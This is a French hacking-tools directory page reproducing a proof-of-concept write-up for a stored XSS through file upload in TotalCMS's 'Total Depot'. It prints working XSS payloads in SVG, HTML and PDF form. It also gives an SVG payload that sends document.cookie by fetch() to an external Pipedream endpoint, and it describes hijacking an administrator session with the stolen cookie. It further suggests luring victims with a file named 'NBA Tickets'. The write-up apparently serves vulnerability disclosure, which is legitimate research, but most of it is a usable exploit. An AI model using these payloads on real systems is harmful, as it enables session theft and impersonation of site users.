Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/sromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesApprentissage et Éducation
GitHubsromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot

TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot

TotalCMS est affecté par une vulnérabilité de téléversement arbitraire de fichier - XSS qui permet un Cross-Site Scripting (XSS) stocké ainsi que le vol de cookies de session.

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

TotalCMS - Téléchargement arbitraire de fichiers - XSS et vol de cookies

Auteur : (Sergio)

Description : TotalCMS est affecté par une vulnérabilité de téléchargement arbitraire de fichiers - XSS qui permet le Cross-Site Scripting (XSS) et également le vol de cookies de session.

Vecteurs d'attaque : Une vulnérabilité dans l'assainissement du téléchargement de fichiers de "Total Depot" permet de télécharger un fichier PDF / SVG / HTML avec un script Cross-Site (XSS) caché et de voler les cookies de l'utilisateur.


Je vais faire 2 PoC :

- POC 1 : Cross-Site scripting (XSS) fichiers PDF / SVG et HTML

- POC 2 : Vol des cookies de l'utilisateur et envoi vers un serveur externe pour les intercepter et usurper l'identité de l'utilisateur.

Nous commençons par le premier PoC :

POC 1 : Cross-Site scripting (XSS) fichiers PDF / SVG et HTML

Lors de la connexion au panneau d'administration (https://www.totalcms.co/demo/total-cms/admin/), nous allons dans la "Total Depot" du site d'administration et nous téléchargeons les fichiers PDF / SVG et HTML avec le XSS caché.

Voici les payloads :

Payload XSS PDF :

Il s'agit d'un payload XSS généré avec l'outil JS2PDFInjector et d'un payload js contenant le contenu suivant :

root@kitploit:~
app.alert("XSS");

Payload SVG :

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

Payload HTML :

root@kitploit:~
<html>
	<script>
		alert(document.cookie);
	</script>
</html>

image

image

Une fois téléchargés, si nous cliquons sur le lien, nous pouvons voir le chemin où ils sont stockés :

image

Chemin des fichiers :

image

image

image

Et voici le résultat avec le Cross-Site Scripting (XSS) des 3 types de fichiers et avec les cookies de l'utilisateur :

image

image

image

Nous passons au deuxième PoC :

- POC 2 : Vol des cookies de l'utilisateur et envoi vers un serveur externe pour les intercepter et usurper l'identité de l'utilisateur.

Nous allons faire comme si nous étions un cybercriminel et nous allons voler les cookies de session de l'utilisateur ; ils seront envoyés au serveur.

Dans ce cas, j'ai téléchargé un fichier comme PoC mais dans un cas réel, nous pouvons télécharger un fichier avec un nom attrayant "NBA Tickets" et le publier, afin que l'utilisateur victime m'envoie les cookies lors de l'exécution du fichier, sans s'en rendre compte.


Tout d'abord, nous effectuons un test pour voir si nous avons une communication avec un serveur externe.

Voici le payload :

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script xlink:href="https://enbjn0l9vbowi.x.pipedream.net/" />     
<script>       
//<![CDATA[         
alert("XSS");       
]]>     
</script>   
</svg>

image

image

Comme nous le voyons dans la requête Pipedream, nous avons obtenu la requête correctement.


Nous modifions le payload pour voler les cookies et les envoyer à la requête Pipedream, afin de pouvoir usurper l'identité de l'utilisateur.


Voici le payload :

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script>
  fetch('https://enbjn0l9vbowi.x.pipedream.net/', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>   
</svg>

Nous l'exécutons :


image

image

Comme nous le voyons sur l'image, nous avons correctement obtenu les cookies de session de l'utilisateur.


Maintenant, nous allons usurper l'identité de l'utilisateur. Pour tester, nous ouvrons une session vers TotalCMS/admin dans un autre navigateur et ouvrons le module complémentaire "Cookie Editor".

image

Nous modifions le cookie de session avec celui obtenu dans Pipedream et enregistrons.

image

Nous avons rechargé le site web et nous avons usurpé l'identité de l'utilisateur administrateur.

image


Informations complémentaires :

https://www.totalcms.co/

https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

Télécharger l’outil